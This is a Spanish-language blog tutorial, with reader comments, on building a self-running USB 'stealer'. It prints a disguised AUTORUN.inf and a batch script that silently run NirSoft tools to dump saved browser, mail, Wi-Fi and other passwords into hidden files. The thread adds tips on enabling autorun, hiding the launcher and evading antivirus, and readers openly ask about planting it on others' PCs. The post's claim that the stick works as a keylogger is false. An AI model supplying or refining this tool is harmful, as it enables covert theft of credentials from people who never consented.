Hace unas semana publiqué una entrada sobre Stealers y expliqué lo que eran y para que servían, hoy vengo a explicaros como crear un USB que se autoejecute y recupere todas nuestras contraseñas del PC de manera automática, únicamente con conectarlo a nuestro PC, sin tocar absolutamente nada, ademas tendrá una función Keylogger, que registrará en un archivo .txt todo lo que pulsemos en nuestro teclado mientras el USB esté conectado al PC.
Pasos a seguir
1) Inserta un pendrive para formatearlo, haz «Click derecho» sobre la unidad y en «Formatear», podemos formatearlo en NTFS o FAT32 (este último es mas recomendado).
2) Abrimos el bloc de notas o similar y escribimos lo siguiente:
[autorun] open = launch.bat UseAutoPlay = 1 ACTION = Escaneando con VirusScan
Guardamos el archivo con el nombre AUTORUN.inf y lo dejamos dentro del USB.
3) Volvemos al bloc de notas para crear otro archivo, esta vez escribiremos:
start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start PasswordFox.exe /stext passwordfox.txt start OperaPassView.exe /stext OperaPassView.txt start ChromePass.exe /stext ChromePass.txt start Dialupass.exe /stext Dialupass.txt start netpass.exe /stext netpass.txt start WirelessKeyView.exe /stext WirelessKeyView.txt start BulletsPassView.exe /stext BulletsPassView.txt start VNCPassView.exe /stext VNCPassView.txt start OpenedFilesView.exe /stext OpenedFilesView.txt start ProduKey.exe /stext ProduKey.txt start USBDeview.exe /stext USBDeview.txt
Guardamos el archivo con el nombre LAUNCH.bat y lo dejamos dentro del USB.
4) Visitamos la web http://www.nirsoft.net/ y nos descargamos las siguiente herramientas:
mspass.exe mailpv.exe iepv.exe pspv.exe PasswordFox.exe OperaPassView.exe ChromePass.exe Dialupass2.exe Netpass.exe WirelessKeyView.exe BulletsPassView.exe VNCPassView.exe OpenedFilesView.exe ProduKey.exe USBDeview.exe
Debemos de descomprimirlas en la raiz del USB, os dejo un link con las direcciones de las Herramientas.
Nos quedaría de la siguiente manera.
5) Descomprimimos todas las herramientas y ocultamos todos los archivos, al final todo quedaría así:
6) Quitamos el USB del ordenador y lo volvemos a insertar para comprobar que funciona, si todo ha ido bien nos aparecerán los siguientes .txt, que no hace falta que los abra porque ya se sabe lo que contienen, todas las contraseñas del sistema, incluidas las del WI-FI.
Espero que os haya gustado, y ya sabéis, no conectéis ningún USB a vuestro ordenador si no es vuestro o dudáis de lo que puede contener.
Hola, lo he probado en 2022 y si que funciona pero no es un keylogger como tal.
Lo que es, es un software que te muestra contraseñas ya guardadas en tu pc como puede ser las de Chrome y las contraseñas de redes wifi metidas con anterioridad.
El tutorial es muy bueno y lo explica a la perfección, pero lo único malo es que no es un keylogger.
Provado en 2020 y windows defender lo detecta. Windows 10 pro, no lo ha ejecutado automaticamente. Me gustaria aprender a corregir estos errores. Además pregunta permisos para ejecutar el programa del wifi.
hola una preguntaa como uso la usb ya que la conecto y no pasa nada y todo los archivos estan oculto y me aparece la usb vacia alguien me diga porfacvor
Hola Alexander,
Este tutorial ya es antiguo, quizás ya no funcione en sistemas operativos nuevos.
Saludos!!
Además de que sencillamente, lo que describes NO ES UN KEYLOGGER.
buenas tardes .como puedo hacer para colocar mi usb como keylogger. necesito que me sirva en cualquier computadora y poder captar todo lo que escriban
javier tu whasap para que me expliques mucho mejor porfa deja tu numero de celular
Cualquiera se hace llamar hacker hoy en dia. Esta sobrevalorado.
hola Javier
porfavor me puedes exlicar un poco lo que contiene el AUTORUN
Hola Benjamín,
No entiendo tu pregunta con «contiene» AUTORUN.
Saludos!!
OYE AMIGO FUNCIONA BIEN LA DE CONTRAER LA CONTRASEÑAS DE WIFI PERO POR ALGUNA RAZON NO SACA LA ULTIMA CONTRASEÑA LA ACTUAL, LO PROBE EN MI PC Y BUENO ESO ES LO QUE PASA
¿Qué sistema operativo? Lo mismo están un poco desactualizadas las herramientas 🙁
Esto sera lo que quieras, menos un Keylogger. Creo que el titulo del post no es muy acertado.
Hola Mateo,
¿Qué título propondrías tu?
Saludos!!
Tu sabes lo que es un keylogger? hay muchas definiciones, pero que diré que keylogger significa «registrador de teclas». Es decir, guarda lo que escribe el usuario en el teclado, no lo que esta almacenado en el sistema. Pon «USB para recuperar contaseñas», pero no «keylogger» por que es falso.
Lo clavaste hermano. Pero este pinche no se entera.
Funciona si abres el .bat manualmente, pero algunas programas ya están obsoletos (ChromePass, por ejemplo) y no sirven. Agradeceria mucho que hicieras un nuevo tutorial actualizado
Creo que el tutorial ya esta algo obsoleto, lamentablemente no me funciono (Uso Windows 10). Espero que en un futuro actualices el tutorial o hagas algún otro con el mismo propósito.
Muchas gracias por todo y muy bien explicado.
Buenas Daniela,
El tutorial es algo antiguo, muy posiblemente no funcionen muchas herramientas.
Tendré en cuenta tu sugerencia para posibles actualizaciones.
Gracias!!
yo tambien lo hice y cuando quito la USB y vuelvo a insertar no me aparece nada
¿Qué sistema operativo tienes?
esto se puede implementar para utilizarlo en andoid ?
con que tipo de herramientas?
Existirán otras técnicas, pero esta desde luego no.
Saludos!
Hola amigo intente los pasos pero no funcionó podrías actualizarlo ya q al usar el usb no salió ningún archivo y la otra es funciona con el pc bloqueado con cuenta de usuario y si el antivirus lo puede detectar y bloquear …se espera pronta respuesta
Hola Roberto,
El post es de hace tiempo, es posible que algunas cosas hayan cambiado, de todas maneras, veré si saco tiempo y hago un post sobre USB Rubber Ducky, esto es indetectable por los antivirus y se ajusta más a lo que necesitas.
Saludos,
Gracias!
el link del dialupass no me funciona (cuando lo intento descargar)
Los links son de hace tiempo, prueba a buscarlo en Nirsoft
se podria usar un otg y hacerlo en android ? O sea en un movil ?
Sí, se podría hacer, pero no con las herramientas que he usado.
Saludos!
no encuentro los archivos para poder descargarlos
Buenas Yuver,
Es posible que algunos links hayan cambiado dado que hace tiempo que escribí esta entrada.
Las herramientas las puedes encontrar en https://www.nirsoft.net/
Saludos!
Los links funcionan correctamente, no hay errores.-
https://hackpuntes.com/wp-content/uploads/2015/05/direccionHerramientas.txt
Gracias por confirmarlo!!
amigo ya lo puliste? una duda al crear el archivo launch.bat y lo quiero ejecutar se abre con el bloc de notas me fui a aplicaciones predeterminadas pero no me da otra opcion que puedo hacer solo es en mi maquina win 8.1
y si ejecuto las apps me da un archivo .cfg
oigan como instalo un usb keylogger en la pc de un amigo sin que se de cuenta que lo tiene>>>_
Pásale una capa de invisibilidad y lo tienes listo!!!
hola amigo, me salio todo perfecto pero lo unica la duda es que no me aparece los documentos de textos o ya despues de conectarlo el usb ¿ que debe de suceder? espero y me respondas y muchas gracias amigo por el tutorial.
Hola Favio,
Comprueba la ruta y letra de tu USB, puede estar fallando.
No hay que realizar ningún paso más, los archivos pasan a tu USB.
Saludos.
Gracias.
hola javier tengo una duda cuando conectas el usb extrae informacion desde que lo conectas o tambien extrae la informacion que fue puesta antes de que lo conecte el usb
Buenas,
Extrae la información que haya en el equipo, es decir, desde antes.
No tienes que dejar el USB conectado para recolectar información.
Saludos,
Gracias
Deberias Actualizar los links a los .exe
https://hackpuntes.com/wp-content/uploads/2015/05/direccionHerramientas.txt
buenas Javier creo que haces un buen trabajo al brindarnos tu experiencia y conocimiento en forma gratuita…mas lamento decir que no me ha funcionado en mi en windows 10. espero me des alguna solución.
un abrazo!!
Buenas Jimy,
Gracias por tu valoración, ¿Puedes indicarme que falla para saber si puedo ayudarte?
Saludos.
Gracias.
Hola javier, muchas gracias por el aporte! primero que nada no le des bola a los comentarios negativos segui para adelante.
Con respecto al .inf no me estaría funcionando conecto el pen pero el .bat no se ejecuta si lo hago manualmente si
Sabes que puede ser?
Saludos!
Buenas Matias,
Te agradezco que valores mi trabajo.
Dependiendo en el sistema operativo / máquina que lo hagas lo hará automáticamente o no.
Puedes crear accesos directos en el pen con .bat ocultos para que se ejecute.
Saludos.
Gracias.
funciona el keylogger?
¿NirSoft es seguro? me refiero a que si de alguna manera ellos también podrían obtener los datos de las víctimas…
Buenas.
He seguido el tutorial al pie de la letra y funciona todo salvo el generar automáticamente los archivos de texto con las contraseñas. Es decir, puedo ejecutar manualmente el .exe de algún programa, como el ChromePass y ver o guardar por mi mismo el archivo de texto pero no lo genera solo el .bat.
Lo he probado en dos equipos distintos y no ha dado resultado, en uno veía los archivos ocultos y en el otro directamente no hacía nada.
Cabe decir que ambos ordenadores tienen W10.
¿Tiene algo que ver el sistema operativo? ¿He hecho algo mal?
Un saludo y gracias por tu tiempo.
Añadir que he ejecutado el .bat por mi mismo y solo ha abierto los programas y ha creado algunos .txt, pocos, pero todos vacíos salvo uno.
Si funciona?
Hola Amigo, podrias decir como Habilitar la autorun en la usb?? pls
Hola, lo he probado pero no me ha funcionado, a los demás les funciona?
Buenas, ¿Qué problema tienes?
Saludos!!!
JAvier, Alguna te trae la de windows, es decir la de inicio de sesión???
Buenas Alberto,
No, ninguna saca la de Windows.
En todo caso, puede que alguna herramienta de Nirsoft saque el hash, pero no la he utilizado en este tuto.
Saludos.
hola como estas Javier muy bueno el tutorial, lo unico que como una persona pregunto no todos los ejecutables crean el txt como por ejemplo el ChromePass.exe y creo que es el mas importante a la hora de extraer contraseñas, solo crea un archivo cfg sin informacion importante… sabes como habria que hacer para solucionarlo? y ademas seria ideal agregar algun comando para que vuelva a cerrar todas las ventanas que abre el ejecutable para que sea del todo automatica..Gracias!
Estimado saludos, gracias por compartir tus conocimientos…la verdad muy agradecido… para descomprirmir los archivos en el pendrive se hace 1 por 1… o se seleccionan todos y se extraen todos ..porq me sale cada vz que se debe reemplazar un archivo que hago se le da si, a todo o se le da no, a todo con respecto al archivo http://www.nirsoft.net/utils/dialupass2.html ya no existe hay una version 3 habra algun problema con eso esperando ..una pronta respuesta estimado y gracias nuevamente
Me extraña que supuestamente seas un informático, programador, apasionado de la seguridad… y publiques esta mierda en el año 2015, cuando eso ya hace años que no funciona, debido a que los S.O. actuales, el autorun lo tiene deshabilitado por defecto. O intentas vender humo o de informático tienes poco.
Hola MrDeiii,
Agradecería que tus comentarios no faltaran el respeto, puede parecerte una «mierda», pero como te he comentado en el comentario anterior, funciona perfectamente incluso en Windows 10, otra cosa es que seas «habilidoso» para activar el autorun.
En cuanto a lo de informático y programador, no sé si lo seré, desde luego he estudiado unos cuantos añitos y aquí tengo los títulos.
Saludos.
Javier no me sale en blog de notas como aparece en la imagen.
me podria dar mas detalles este es mi correo
Eso que explica no funciona. Funcionaba hace unos 10 años o mas, pero actualmente no, ja que se ejecuta automáticamente con autorun y el autorun, en los sistemas operativos actuales esta deshabilitado. Creo que el ultimo Windows que lo tenia habilitado por defecto, era el XP.
Buenas,
Agradezco tu comentario.
Si el autorun esta deshabilitado, hay maneras para habilitarlo.
Lo he probado en Windows 10 y salvo una herramienta las demás funcionan perfectamente.
Saludos.
sabes como activar el autorun en windows 10?
me prodrías echar una manita?
Claro amigo,
Debes ir a Configuración de Windows > Dispositivos > Reproducción automática y allí configuras según tus preferencias.
Espero te sirva de ayuda.
Saludos!!
Disculpa tío, pero no me crea los archivos de texto que se suponen que hacen…
Me puedes decir a que se debe eso?…
No funciona en windows 10
NO ME CREA LOS TXT
no me crea los archivos de texto
Esta caído el enlace del cuarto programa para descargar 🙁
Muy buen post lo unico es que no me funciona hice todo igualito que tu pero al volver a conectar el usb no aparecen los archivos txt me pueder decir porque o alomejor no es compatible con el windows 8.1
Hola, te he enviado varios mensajes por twitter.
Me gustaría saber si vas a arreglar el problema del Dialupass2.exe.
Gracias de antemano.
son necesarias todas las herramientas osea hay que descargarlas todas porque no puedo descargar esta Dialupass2.exe y probe si funcionaba sin ella y no aparece nada
Buenas, e echo todo el proceso, pero cuando quito la memoria y vuelvo y la meto no me aparece ninguna contraseña, me aparece sin nada le mamoria, el archivo Dialupass2.exe no se encuentra, se encuentra es la vercion 3, que fue la que descargue, hay algun problema de pronto en eso ?
muy bueno el post!!! me he quedado impresionada. Me gustaria saber si hay alguna opcion de copiar el contenido de todas las imagenes jpeg o videos del pc tb al usb en modo oculto
muchas gracias
Mi pc no deja descargarme los archivos los detecta como maliciosos? . igual pasara si lo conécto a la PC
Hola Juan,
Es posible que si tienes el antivirus activado los detecte como maliciosos.
Algunas firmas tienes el dominio de Nirsoft como malicioso, cuando no es así.
Saludos.
Las herramientas de Nir ya las conocía, pero este método está muy bien….siempre y cuando no tenga inhabilitado el autorun del usb…
Lo probaré, muy instructivo….le enseñaré a mi hijo que no se fie de un pendrive ajeno…
Saludos
Hola amigo, me alegra que enseñes a tener precaución a tu hijo partiendo de un articulo mio. Es lo mas satisfactorio para mí.
Saludos.
buen aporte pero mira los archivo me aparecen como archivo CFG no como archivoz de texto no se xq si me puedes ayudar te lo agradeceria
gracias esta muy chulo!
Muchas gracias amigo.
Saludos.
hola Javier
porfavor me podrias explicar un poco sobre el contenido del autorun